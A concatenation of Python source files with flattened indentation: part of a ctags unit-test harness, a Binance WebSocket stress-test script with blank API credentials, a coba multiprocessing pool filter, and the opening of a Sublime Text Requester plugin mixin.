for p in arg.split(','):
ret = re.match(r'(.*)/(.*)', p)
if not ret:
error_exit(1, 'wrong format of --_pretend option arg')
(newlang, oldlang) = ret.group(1, 2)
if newlang == '':
error_exit(1, 'newlang part of --_pretend option arg is empty')
if oldlang == '':
error_exit(1, 'oldlang part of --_pretend option arg is empty')
r += ' --_pretend-' + newlang + '=' + oldlang
return r
def action_run(parser, action, *args):
global CATEGORIES
global CTAGS
global UNITS
global LANGUAGES
global WITH_TIMEOUT
global WITH_VALGRIND
global COLORIZED_OUTPUT
global RUN_SHRINK
global SHOW_DIFF_OUTPUT
global PRETENSE_OPTS
global NUM_WORKER_THREADS
global SHELL
parser.add_argument('--categories', metavar='CATEGORY1[,CATEGORY2,...]',
help='run only CATEGORY* related cases.')
parser.add_argument('--ctags',
help='ctags executable file for testing')
parser.add_argument('--units', metavar='UNITS1[,UNITS2,...]',
help='run only UNIT(S).')
parser.add_argument('--languages', metavar='PARSER1[,PARSER2,...]',
help='run only PARSER* related cases.')
parser.add_argument('--with-timeout', type=int, default=0,
metavar='DURATION',
help='run a test case with specified timeout in seconds. 0 means no timeout (default).')
parser.add_argument('--with-valgrind', action='store_true', default=False,
help='run a test case under valgrind')
parser.add_argument('--colorized-output', choices=['yes', 'no'], default='yes',
help='print the result in color.')
parser.add_argument('--run-shrink', action='store_true', default=False,
help='(TODO: NOT IMPLEMENTED YET)')
parser.add_argument('--show-diff-output', action='store_true', default=False,
help='show diff output (and valgrind errors) for failed test cases in the summary.')
parser.add_argument('--with-pretense-map',
metavar='NEWLANG0/OLDLANG0[,...]',
help='make NEWLANG parser pretend OLDLANG.')
parser.add_argument('--threads', type=int, default=NUM_WORKER_THREADS,
help='number of worker threads')
parser.add_argument('--shell',
help='shell to be used.')
parser.add_argument('units_dir',
help='Units directory.')
parser.add_argument('build_dir', nargs='?', default='',
help='Build directory. If not given, units_dir is used.')
res = parser.parse_args(args)
if res.categories:
CATEGORIES = [x if x == 'ROOT' or x.endswith('.r') else x + '.r'
for x in res.categories.split(',')]
if res.ctags:
CTAGS = res.ctags
if res.units:
UNITS = res.units.split(',')
if res.languages:
LANGUAGES = res.languages.split(',')
WITH_TIMEOUT = res.with_timeout
WITH_VALGRIND = res.with_valgrind
COLORIZED_OUTPUT = (res.colorized_output == 'yes')
RUN_SHRINK = res.run_shrink
SHOW_DIFF_OUTPUT = res.show_diff_output
if res.with_pretense_map:
PRETENSE_OPTS = make_pretense_map(res.with_pretense_map)
NUM_WORKER_THREADS = res.threads
if res.shell:
SHELL = res.shell
if res.build_dir == '':
res.build_dir = res.units_dir
if WITH_VALGRIND:
check_availability('valgrind')
check_availability('diff')
init_features()
if isabs(res.build_dir):
build_dir = res.build_dir
else:
build_dir = os.path.realpath(res.build_dir)
category = _DEFAULT_CATEGORY
if len(CATEGORIES) == 0 or (category in CATEGORIES):
run_dir(category, res.units_dir, build_dir)
for d in glob.glob(res.units_dir + '/*.r'):
d = d.replace('\\', '/') # for Windows
if not os.path.isdir(d):
continue
category = os.path.basename(d)
build_d = res.build_dir + '/' + category
run_dir(category, d, build_d)
run_summary(build_dir)
if L_FAILED_BY_STATUS or L_FAILED_BY_DIFF or \
L_FAILED_BY_TIMEED_OUT or L_BROKEN_ARGS_CTAGS or \
L_VALGRIND:
return 1
else:
return 0
def action_clean(parser, action, *args):
parser.add_argument('units_dir',
help='Build directory for units testing.')
res = parser.parse_args(args)
units_dir = res.units_dir
if not os.path.isdir(units_dir):
error_exit(0, 'No such directory: ' + units_dir)
for bundles in glob.glob(units_dir + '/**/BUNDLES', recursive=True):
clean_bundles(bundles)
for fn in glob.glob(units_dir + '/**/*.tmp', recursive=True):
os.remove(fn)
for fn in glob.glob(units_dir + '/**/*.TMP', recursive=True):
os.remove(fn)
return 0
def tmain_compare_result(build_topdir):
for fn in glob.glob(build_topdir + '/*/*-diff.txt'):
print(fn)
print()
with open(fn, 'r', errors='replace') as f:
for l in f:
print("\t" + l, end='')
print()
for fn in glob.glob(build_topdir + '/*/gdb-backtrace.txt'):
with open(fn, 'r', errors='replace') as f:
for l in f:
print("\t" + l, end='')
def tmain_compare(subdir, build_subdir, aspect, file):
msg = '%-59s ' % (aspect)
generated = build_subdir + '/' + aspect + '-diff.txt'
actual = build_subdir + '/' + aspect + '-actual.txt'
expected = subdir + '/' + aspect + '-expected.txt'
if os.path.isfile(actual) and os.path.isfile(expected) and \
filecmp.cmp(actual, expected):
run_result('ok', msg, None, file=file)
# When successful, remove files generated in the last
# failure to make the directory clean.
# Unlike other generated files like gdb-backtrace.txt
# misc/review script looks at the -diff.txt file.
# Therefore we handle -diff.txt specially here.
if os.path.isfile(generated):
os.remove(generated)
return True
else:
with open(generated, 'wb') as f:
subprocess.run(['diff', '-U',
str(DIFF_U_NUM), '--strip-trailing-cr',
expected, actual],
stdout=f, stderr=subprocess.STDOUT)
run_result('error', msg, None, 'diff: ' + generated, file=file)
return False
def failed_git_marker(fn):
if shutil.which('git'):
ret = subprocess.run(['git', 'ls-files', '--', fn],
stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
if ret.returncode == 0 and ret.stdout == b'':
return '<G>'
return ''
def is_crashed(fn):
with open(fn, 'r') as f:
if 'core dump' in f.read():
return True
return False
def print_backtraces(ctags_exe, cores, fn):
with open(fn, 'wb') as f:
for coref in cores:
subprocess.run(['gdb', ctags_exe, '-c', coref, '-ex', 'where', '-batch'],
stdout=f, stderr=subprocess.DEVNULL)
def tmain_sub(test_name, basedir, subdir, build_subdir):
global TMAIN_STATUS
global TMAIN_FAILED
CODE_FOR_IGNORING_THIS_TMAIN_TEST = 77
os.makedirs(build_subdir, exist_ok=True)
for fn in glob.glob(build_subdir + '/*-actual.txt'):
os.remove(fn)
strbuf = io.StringIO()
print("\nTesting " + test_name, file=strbuf)
line('-', file=strbuf)
if isabs(CTAGS):
ctags_path = CTAGS
else:
ctags_path = os.path.join(basedir, CTAGS)
if isabs(READTAGS):
readtags_path = READTAGS
else:
readtags_path = os.path.join(basedir, READTAGS)
if isabs(OPTSCRIPT):
optscript_path = OPTSCRIPT
else:
optscript_path = os.path.join(basedir, OPTSCRIPT)
start = time.time()
ret = subprocess.run([SHELL, 'run.sh',
ctags_path,
build_subdir,
readtags_path,
optscript_path],
cwd=subdir,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#print('execute time: %f' % (time.time() - start), file=strbuf)
encoding = 'utf-8'
try:
stdout = ret.stdout.decode(encoding).replace("\r\n", "\n")
except UnicodeError:
encoding = 'iso-8859-1'
stdout = ret.stdout.decode(encoding).replace("\r\n", "\n")
stderr = ret.stderr.decode('utf-8').replace("\r\n", "\n")
if os.path.basename(CTAGS) != 'ctags':
# program name needs to be canonicalized
stderr = re.sub('(?m)^' + os.path.basename(CTAGS) + ':', 'ctags:', stderr)
if ret.returncode == CODE_FOR_IGNORING_THIS_TMAIN_TEST:
run_result('skip', '', None, stdout.replace("\n", ''), file=strbuf)
print(strbuf.getvalue(), end='')
sys.stdout.flush()
strbuf.close()
return True
with open(build_subdir + '/exit-actual.txt', 'w', newline='\n') as f:
print(ret.returncode, file=f)
with open(build_subdir + '/stdout-actual.txt', 'w', newline='\n', encoding=encoding) as f:
print(stdout, end='', file=f)
with open(build_subdir + '/stderr-actual.txt', 'w', newline='\n') as f:
print(stderr, end='', file=f)
if os.path.isfile(build_subdir + '/tags'):
os.rename(build_subdir + '/tags', build_subdir + '/tags-actual.txt')
for aspect in ['stdout', 'stderr', 'exit', 'tags']:
expected_txt = subdir + '/' + aspect + '-expected.txt'
actual_txt = build_subdir + '/' + aspect + '-actual.txt'
if os.path.isfile(expected_txt):
if tmain_compare(subdir, build_subdir, aspect, strbuf):
os.remove(actual_txt)
else:
TMAIN_FAILED += [test_name + '/' + aspect + '-compare' +
failed_git_marker(expected_txt)]
TMAIN_STATUS = False
if aspect == 'stderr' and \
is_crashed(actual_txt) and \
shutil.which('gdb'):
print_backtraces(ctags_path,
glob.glob(build_subdir + '/core*'),
build_subdir + '/gdb-backtrace.txt')
elif os.path.isfile(actual_txt):
os.remove(actual_txt)
print(strbuf.getvalue(), end='')
sys.stdout.flush()
strbuf.close()
return True
def tmain_run(topdir, build_topdir, units):
global TMAIN_STATUS
TMAIN_STATUS = True
(q, threads) = create_thread_queue(tmain_sub)
basedir = os.getcwd()
for subdir in glob.glob(topdir + '/*.d'):
test_name = os.path.basename(subdir)[:-2]
if len(units) > 0 and not test_name in units:
continue
build_subdir = build_topdir + '/' + os.path.basename(subdir)
q.put((test_name, basedir, subdir, build_subdir))
join_workers(q, threads)
print()
if not TMAIN_STATUS:
print('Failed tests')
line('=')
for f in TMAIN_FAILED:
print(re.sub('<G>', ' (not committed/cached yet)', f))
print()
if SHOW_DIFF_OUTPUT:
print('Detail [compare]')
line('-')
tmain_compare_result(build_topdir)
return TMAIN_STATUS
def action_tmain(parser, action, *args):
global CTAGS
global COLORIZED_OUTPUT
global WITH_VALGRIND
global SHOW_DIFF_OUTPUT
global READTAGS
global OPTSCRIPT
global UNITS
global NUM_WORKER_THREADS
global SHELL
parser.add_argument('--ctags',
help='ctags executable file for testing')
parser.add_argument('--colorized-output', choices=['yes', 'no'], default='yes',
help='print the result in color.')
parser.add_argument('--with-valgrind', action='store_true', default=False,
help='(not implemented) run a test case under valgrind')
parser.add_argument('--show-diff-output', action='store_true', default=False,
help='how diff output for failed test cases in the summary.')
parser.add_argument('--readtags',
help='readtags executable file for testing')
parser.add_argument('--optscript',
help='optscript executable file for testing')
parser.add_argument('--units', metavar='UNITS1[,UNITS2,...]',
help='run only Tmain/UNIT*.d (.d is not needed)')
parser.add_argument('--threads', type=int, default=NUM_WORKER_THREADS,
help='number of worker threads')
parser.add_argument('--shell',
help='shell to be used.')
parser.add_argument('tmain_dir',
help='Tmain directory.')
parser.add_argument('build_dir', nargs='?', default='',
help='Build directory. If not given, tmain_dir is used.')
res = parser.parse_args(args)
if res.ctags:
CTAGS = res.ctags
COLORIZED_OUTPUT = (res.colorized_output == 'yes')
WITH_VALGRIND = res.with_valgrind
SHOW_DIFF_OUTPUT = res.show_diff_output
if res.readtags:
READTAGS = res.readtags
if res.optscript:
OPTSCRIPT = res.optscript
if res.units:
UNITS = res.units.split(',')
NUM_WORKER_THREADS = res.threads
if res.shell:
SHELL = res.shell
if res.build_dir == '':
res.build_dir = res.tmain_dir
#check_availability('awk')
check_availability('diff')
if isabs(res.build_dir):
build_dir = res.build_dir
else:
build_dir = os.path.realpath(res.build_dir)
ret = tmain_run(res.tmain_dir, build_dir, UNITS)
if ret:
return 0
else:
return 1
def action_clean_tmain(parser, action, *args):
parser.add_argument('tmain_dir',
help='Build directory for tmain testing.')
res = parser.parse_args(args)
tmain_dir = res.tmain_dir
if not os.path.isdir(tmain_dir):
error_exit(0, 'No such directory: ' + tmain_dir)
for obj in ['stdout', 'stderr', 'exit', 'tags']:
for typ in ['actual', 'diff']:
for fn in glob.glob(tmain_dir + '/**/' + obj + '-' + typ + '.txt', recursive=True):
os.remove(fn)
for fn in glob.glob(tmain_dir + '/**/gdb-backtrace.txt', recursive=True):
os.remove(fn)
return 0
def prepare_environment():
global _PREPERE_ENV
os.environ['LC_ALL'] = 'C'
os.environ['MSYS2_ARG_CONV_EXCL'] = '--regex-;--_scopesep;--exclude;--exclude-exception'
_PREPERE_ENV = """LC_ALL="C"; export LC_ALL
MSYS2_ARG_CONV_EXCL='--regex-;--_scopesep;--exclude;--exclude-exception' export MSYS2_ARG_CONV_EXCL
"""
# enable ANSI escape sequences on Windows 10 1511 (10.0.10586) or later
def enable_esc_sequence():
if os.name != 'nt':
return
import ctypes
kernel32 = ctypes.windll.kernel32
ENABLE_VIRTUAL_TERMINAL_PROCESSING = 4
STD_OUTPUT_HANDLE = -11
out = kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
mode = ctypes.c_ulong()
if kernel32.GetConsoleMode(out, ctypes.byref(mode)):
kernel32.SetConsoleMode(out,
mode.value | ENABLE_VIRTUAL_TERMINAL_PROCESSING)
def main():
prepare_environment()
enable_esc_sequence()
parser = argparse.ArgumentParser(
description='Units test harness for ctags.')
subparsers = parser.add_subparsers(dest='action', metavar='ACTION')
cmdmap = {}
cmdmap['run'] = [action_run,
subparsers.add_parser('run', aliases=['units'],
description='Run all tests case under units_dir.',
help='Run all tests case')]
cmdmap['units'] = cmdmap['run']
cmdmap['clean'] = [action_clean,
subparsers.add_parser('clean',
description='Clean all files created during units testing.',
help='Clean all files created during units testing')]
cmdmap['tmain'] = [action_tmain,
subparsers.add_parser('tmain',
description='Run tests for main part of ctags.',
help='Run tests for main part of ctags')]
cmdmap['clean-tmain'] = [action_clean_tmain,
subparsers.add_parser('clean-tmain',
description='Clean all files created during tmain testing.',
help='Clean all files created during tmain testing')]
subparsers.add_parser('help',
help='show this help message and exit')
cmdmap['help'] = [action_help, parser]
if len(sys.argv) < 2:
parser.print_help()
sys.exit(1)
res = parser.parse_args(sys.argv[1:2])
(func, subparser) = cmdmap[res.action]
sys.exit(func(subparser, *sys.argv[1:]))
if __name__ == '__main__':
main()
|
dev_test_full_non_stop.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: dev_test_full_non_stop.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
time.sleep(30)
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
logging.getLogger('unicorn-log').addHandler(logging.StreamHandler())
logging.getLogger('unicorn-log').setLevel(logging.INFO)
# create instance of BinanceWebSocketApiManager
binance_websocket_api_manager = BinanceWebSocketApiManager()
print("starting monitoring api!")
binance_websocket_api_manager.start_monitoring_api()
# set api key and secret for userData stream
binance_api_key = ""
binance_api_secret = ""
binance_websocket_api_manager.set_private_api_config(binance_api_key, binance_api_secret)
userdata_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!userData"])
ticker_all_stream_id = binance_websocket_api_manager.create_stream(["!ticker"], ["arr"])
miniticker_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!miniTicker"])
markets = {'bnbbtc', 'ethbtc', 'btcusdt', 'bchabcusdt', 'xrpusdt', 'rvnbtc', 'ltcusdt', 'adausdt', 'eosusdt',
'neousdt', 'bnbusdt', 'adabtc', 'ethusdt', 'trxbtc', 'bchabcbtc', 'ltcbtc', 'xrpbtc',
'ontbtc', 'bttusdt', 'eosbtc', 'xlmbtc', 'bttbtc', 'tusdusdt', 'xlmusdt', 'qkcbtc', 'zrxbtc',
'neobtc', 'adaeth', 'icxusdt', 'btctusd', 'icxbtc', 'btcusdc', 'wanbtc', 'zecbtc', 'wtcbtc',
'batbtc', 'adabnb', 'etcusdt', 'qtumusdt', 'xmrbtc', 'trxeth', 'adatusd', 'trxxrp', 'trxbnb',
'dashbtc', 'rvnbnb', 'bchabctusd', 'etcbtc', 'bnbeth', 'ethpax', 'nanobtc', 'xembtc', 'xrpbnb',
'bchabcpax', 'xrpeth', 'bttbnb', 'ltcbnb', 'agibtc', 'zrxusdt', 'xlmbnb', 'ltceth', 'eoseth',
'ltctusd', 'polybnb', 'scbtc', 'steembtc', 'trxtusd', 'npxseth', 'kmdbtc', 'polybtc', 'gasbtc',
'engbtc', 'zileth', 'xlmeth', 'eosbnb', 'xrppax', 'lskbtc', 'npxsbtc', 'xmrusdt', 'ltcpax',
'ethtusd', 'batusdt', 'mcobtc', 'neoeth', 'bntbtc', 'eostusd', 'lrcbtc', 'funbtc', 'zecusdt',
'bnbpax', 'linkusdt', 'hceth', 'zrxeth', 'icxeth', 'xmreth', 'neobnb', 'etceth', 'zeceth', 'xmrbnb',
'wanbnb', 'zrxbnb', 'agibnb', 'funeth', 'arketh', 'engeth'}
binance_websocket_api_manager.create_stream(["aggTrade"], markets)
binance_websocket_api_manager.create_stream(["trade"], markets)
binance_websocket_api_manager.create_stream(["kline_1m"], markets)
binance_websocket_api_manager.create_stream(["kline_5m"], markets)
binance_websocket_api_manager.create_stream(["kline_15m"], markets)
binance_websocket_api_manager.create_stream(["kline_1h"], markets)
binance_websocket_api_manager.create_stream(["kline_12h"], markets)
binance_websocket_api_manager.create_stream(["kline_1w"], markets)
binance_websocket_api_manager.create_stream(["ticker"], markets)
binance_websocket_api_manager.create_stream(["miniTicker"], markets)
binance_websocket_api_manager.create_stream(["depth"], markets)
binance_websocket_api_manager.create_stream(["depth5"], markets)
binance_websocket_api_manager.create_stream(["depth10"], markets)
binance_websocket_api_manager.create_stream(["depth20"], markets)
binance_websocket_api_manager.create_stream(["aggTrade"], markets)
markets = {'bnbbtc', 'ethbtc', 'btcusdt', 'bchabcusdt', 'xrpusdt', 'rvnbtc', 'ltcusdt', 'adausdt', 'eosusdt',
'neobtc', 'adaeth', 'icxusdt', 'btctusd', 'icxbtc', 'btcusdc', 'wanbtc', 'zecbtc', 'wtcbtc',
'batbtc', 'adabnb', 'etcusdt', 'qtumusdt', 'xmrbtc', 'trxeth', 'adatusd', 'trxxrp', 'trxbnb',
'ltctusd', 'polybnb', 'scbtc', 'steembtc', 'trxtusd', 'npxseth', 'kmdbtc', 'polybtc', 'gasbtc',
'bnbpax', 'linkusdt', 'hceth', 'zrxeth', 'icxeth', 'xmreth', 'neobnb', 'etceth', 'zeceth', 'xmrbnb'}
channels = {'trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_12h', 'kline_1w',
'miniTicker', 'depth20'}
id = binance_websocket_api_manager.create_stream(channels, markets)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
# show an overview
while True:
binance_websocket_api_manager.print_summary()
#binance_websocket_api_manager.print_stream_info(id)
time.sleep(1)
|
multiprocessing.py | import sys
import multiprocessing.pool
from multiprocessing import Manager
from threading import Thread
from typing import Sequence, Iterable, Any
from coba.config import CobaConfig, IndentLogger, CobaFatal
from coba.pipes import Filter, Sink, Pipe, StopPipe, QueueSource, QueueSink
super_worker = multiprocessing.pool.worker #type: ignore
def worker(inqueue, outqueue, initializer=None, initargs=(), maxtasks=None, wrap_exception=False):
try:
super_worker(inqueue, outqueue, initializer, initargs, maxtasks, wrap_exception)
except KeyboardInterrupt:
#we handle this exception because otherwise it is thrown and written to console
#by handling it ourself we can prevent it from being written to console
sys.exit(2000)
except AttributeError:
#we handle this exception because otherwise it is thrown and written to console
#by handling it ourself we can prevent it from being written to console
sys.exit(1000) #this is the exitcode we use to indicate when we're exiting due to import errors
multiprocessing.pool.worker = worker #type: ignore
class MultiprocessFilter(Filter[Iterable[Any], Iterable[Any]]):
class Processor:
def __init__(self, filters: Sequence[Filter], stdout: Sink, stdlog:Sink, n_proc:int) -> None:
self._filter = Pipe.join(filters)
self._stdout = stdout
self._stdlog = stdlog
self._n_proc = n_proc
def process(self, item) -> None:
#One problem with this is that the settings on the main thread's logger
#aren't propogated to this logger. For example, with_stamp and with_name.
#A possible solution is to deep copy the CobaConfig.Logger, set its `sink`
#property to the `stdlog` and then pass it to `Processor.__init__`.
CobaConfig.Logger = IndentLogger(self._stdlog, with_name=self._n_proc > 1)
try:
self._stdout.write(self._filter.filter([item]))
except StopPipe:
pass
except Exception as e:
CobaConfig.Logger.log_exception(e)
except KeyboardInterrupt:
#When ctrl-c is pressed on the keyboard KeyboardInterrupt is raised in each
#process. We need to handle this here because Processor is always ran in a
#background process and receives this. We can ignore this because the exception will
#also be raised in our main process. Therefore we simply ignore and trust the main to
#handle the keyboard interrupt gracefully.
pass
def __init__(self, filters: Sequence[Filter], processes=1, maxtasksperchild=None) -> None:
self._filters = filters
self._processes = processes
self._maxtasksperchild = maxtasksperchild
def filter(self, items: Iterable[Any]) -> Iterable[Any]:
if len(self._filters) == 0:
return items
try:
with Manager() as manager:
stdout_queue = manager.Queue() #type: ignore
stdlog_queue = manager.Queue() #type: ignore
stdout_writer, stdout_reader = QueueSink(stdout_queue), QueueSource(stdout_queue)
stdlog_writer, stdlog_reader = QueueSink(stdlog_queue), QueueSource(stdlog_queue)
class MyPool(multiprocessing.pool.Pool):
_missing_error_definition_error_is_new = True
def _join_exited_workers(self):
for worker in self._pool:
if worker.exitcode == 1000 and MyPool._missing_error_definition_error_is_new:
#this is a hack... This only works so long as we just
#process one job at a time... This is true in our case.
#this is necessary because multiprocessing can get stuck
#waiting for failed workers and that is frustrating for users.
MyPool._missing_error_definition_error_is_new = False
message = (
"Coba attempted to evaluate your benchmark in multiple processes but the pickle module was unable to "
"find all the definitions needed to pass the tasks to the processes. The two most common causes of "
"this error are: 1) a learner or simulation is defined in a Jupyter Notebook cell or 2) a necessary "
"class definition exists inside the `__name__=='__main__'` code block in the main execution script. In "
"either case there are two simple solutions: 1) evalute your benchmark in a single processed with no "
"limit on child tasks or 2) define all you classes in a separate python file that is imported when "
"evaluating."
)
CobaConfig.Logger.log(message)
if worker.exitcode is not None and worker.exitcode != 0:
#A worker exited in an uncontrolled manner and was unable to clean its job
#up. We therefore mark one of the jobs as "finished" but failed to prevent an
#infinite wait on a failed job to finish that is actually no longer running.
list(self._cache.values())[0]._set(None, (False, None))
return super()._join_exited_workers()
with MyPool(self._processes, maxtasksperchild=self._maxtasksperchild) as pool:
# handle not picklable (this is handled by done_or_failed)
# handle empty list (this is done by checking result.ready())
# handle exceptions in process (unhandled exceptions can cause children to hang so we pass them to stderr)
# handle ctrl-c without hanging
# > don't call result.get when KeyboardInterrupt has been hit
# > handle EOFError,BrokenPipeError errors with queue since ctr-c kills manager
# handle AttributeErrors. These occure when... (this is handled by shadowing several pool methods)
# > a class that is defined in a Jupyter Notebook cell is pickled
# > a class that is defined inside the __name__=='__main__' block is pickeled
# handle Benchmark.evaluate not being called inside of __name__=='__main__' (this is handled by a big try/catch)
def done_or_failed(results_or_exception=None):
#This method is called one time at the completion of map_async
#in the case that one of our jobs threw an exception the argument
#will contain an exception otherwise it will be the returned results
#of all the jobs. This method is executed on a thread in the Main context.
if isinstance(results_or_exception, Exception):
from coba.config import CobaConfig
if "Can't pickle" in str(results_or_exception) or "Pickling" in str(results_or_exception):
message = (
str(results_or_exception) + ". Coba attempted to process your Benchmark on multiple processes and "
"the named class was not able to be pickled. This problem can be fixed in one of two ways: 1) "
"evaluate the benchmark in question on a single process with no limit on the tasks per child or 2) "
"modify the named class to be picklable. The easiest way to make the given class picklable is to "
"add `def __reduce__ (self) return (<the class in question>, (<tuple of constructor arguments>))` to "
"the class. For more information see https://docs.python.org/3/library/pickle.html#object.__reduce__."
)
CobaConfig.Logger.log(message)
else:
CobaConfig.Logger.log_exception(results_or_exception)
stdout_writer.write([None])
stdlog_writer.write([None])
log_thread = Thread(target=Pipe.join(stdlog_reader, [], CobaConfig.Logger.sink).run)
log_thread.daemon = True
log_thread.start()
processor = MultiprocessFilter.Processor(self._filters, stdout_writer, stdlog_writer, self._processes)
result = pool.map_async(processor.process, items, callback=done_or_failed, error_callback=done_or_failed, chunksize=1)
# When items is empty finished_callback will not be called and we'll get stuck waiting for the poison pill.
# When items is empty ready() will be true immediately and this check will place the poison pill into the queues.
if result.ready(): done_or_failed()
try:
for item in stdout_reader.read():
yield item
pool.close()
except (KeyboardInterrupt, Exception):
try:
pool.terminate()
except:
pass
raise
finally:
pool.join()
log_thread.join()
except RuntimeError as e:
#This happens when importing main causes this code to run again
raise CobaFatal(str(e)) |
__init__.py | import sublime
import os
import sys
import imp
import re
import json
from collections import OrderedDict
from threading import Thread, Lock
from time import time
from queue import Queue
from ..add_path import add_path
from .helpers import is_auxiliary_view
from .responses import ResponseThreadPool, prepend_library
class RequestCommandMixin:
"""This mixin is the motor for parsing an env, executing requests in parallel
in the context of this env, invoking activity indicator methods, and invoking
response handling methods. These methods can be overridden to control the
behavior of classes that inherit from this mixin.
It must be mixed in to classes that also inherit from
`sublime_plugin.TextCommand`.
"""
REFRESH_MS = 100 # period of checks on async operations, e.g. requests
ACTIVITY_SPACES = 9 # number of spaces in activity indicator
MAX_WORKERS = 10 # default request concurrency
RESPONSE_POOLS = Queue()
MAX_NUM_RESPONSE_POOLS = 10 # up to N response pools can be stored
LOCK = Lock() # this lock is shared among all instances
def get_requests(self):
"""This must be overridden to return a list of request strings.
Hint: use `core.parsers.parse_requests`.
"""
raise NotImplementedError(
'"get_requests" must be overridden to return a list of request strings')
def show_activity_for_pending_requests(self, requests, count, activity):
"""Override this method to customize user feedback for pending requests.
`activity` string is passed for convenience, it is generated by
`get_activity_indicator`.
"""
def handle_response(self, response):
"""Override this method to handle a response from a single request. This
method is called as each response is returned.
"""
def handle_responses(self, responses):
"""Override this method to handle responses from all requests executed.
This method is called after all responses have been returned.
"""
def handle_errors(self, responses):
"""Override this method to change Requester's default error handling. This
is a convenience method that is called on all responses after they are
returned.
"""
errors = ['{}\n{}'.format(r.req.request, r.err) for r in responses if r.err]
if errors:
sublime.error_message('\n\n'.join(errors[:100]))
if len(errors) > 100:
print('Requester Errors: {} remaining errors not printed'.format(len(errors) - 100))
def run(self, edit):
self.reset_status()
self.config = sublime.load_settings('Requester.sublime-settings')
# `run` runs first, which means `self.config` is available to all methods
thread = Thread(target=self._get_env)
thread.start()
self._run(thread)
def _run(self, thread, count=0):
"""Evaluate environment in a separate thread and show an activity
indicator. Inspect thread at regular intervals until it's finished, at
which point `make_requests` can be invoked. Return if thread times out.
"""
REFRESH_MULTIPLIER = 2
activity = self.get_activity_indicator(count//REFRESH_MULTIPLIER, self.ACTIVITY_SPACES)
if count > 0: # don't distract user with RequesterEnv status if env can be evaluated quickly
self.view.set_status('requester.activity', '{} {}'.format('RequesterEnv', activity))
if thread.is_alive():
timeout = self.config.get('timeout_env', None)
if timeout is not None and count * self.REFRESH_MS/REFRESH_MULTIPLIER > timeout * 1000:
sublime.error_message('Timeout Error: environment took too long to parse')
self.view.set_status('requester.activity', '')
return
sublime.set_timeout(lambda: self._run(thread, count+1), self.REFRESH_MS/REFRESH_MULTIPLIER)
else:
requests = self.get_requests()
self.view.set_status('requester.activity', '')
self.make_requests(requests, self._env)
def get_env(self):
"""Computes an env from `requester.env_string` and `requester.file`
settings. Returns a tuple containing an env dictionary and a combined env
string.
http://stackoverflow.com/questions/67631/how-to-import-a-module-given-the-full-path
"""
env_strings = []
packages_path = self.config.get('packages_path', '')
if packages_path and packages_path not in sys.path: # makes it possible to import any Python package in env
sys.path.append(packages_path)
env_block, env_block_line_number, env_file, env_file_line_number = [None] * 4
parsed = False
if not is_auxiliary_view(self.view): # (1) try to get env from current view
self.view.settings().set('requester.file', self.view.file_name())
text = self.view.substr(sublime.Region(0, self.view.size()))
env_block, env_block_line_number, env_file, env_file_line_number = self.parse_env(text)
parsed = True
else:
file = self.view.settings().get('requester.file', None)
if file: # (2) try to get env from saved requester file if (1) not possible
try:
with open(file, 'r', encoding='utf-8') as f:
text = f.read()
except Exception as e:
self.add_error_status_bar(str(e))
else:
env_block, env_block_line_number, env_file, env_file_line_number = self.parse_env(text)
parsed = True
if not parsed: # (3) try to get env from saved env string if (1) and (2) not possible
env_string = self.view.settings().get('requester.env_string', None)
return self.get_env_dict_from_string(env_string), env_string
if env_file:
if not os.path.isabs(env_file):
file_path = self.view.settings().get('requester.file')
if file_path:
env_file = os.path.join(os.path.dirname(file_path), env_file)
try:
with open(env_file, 'r') as f:
env_strings.append(f.read())
except Exception as e:
self.add_error_status_bar(str(e))
env_strings.append(env_block)
non_empty_env_strings = [s for s in env_strings if s]
if env_block_line_number is not None and env_file_line_number is not None:
if env_block_line_number < env_file_line_number:
non_empty_env_strings.reverse()
env_string = '\n\n'.join(non_empty_env_strings)
self.view.settings().set('requester.env_string', env_string)
return self.get_env_dict_from_string(env_string), env_string
def _get_env(self):
"""Wrapper calls `get_env`, assigns return values to instance properties.
"""
self._env, self._env_string = self.get_env()
def set_env_on_view(self, view):
"""Convenience method that copies env settings from this view to `view`.
"""
for setting in ['requester.file', 'requester.env_string']:
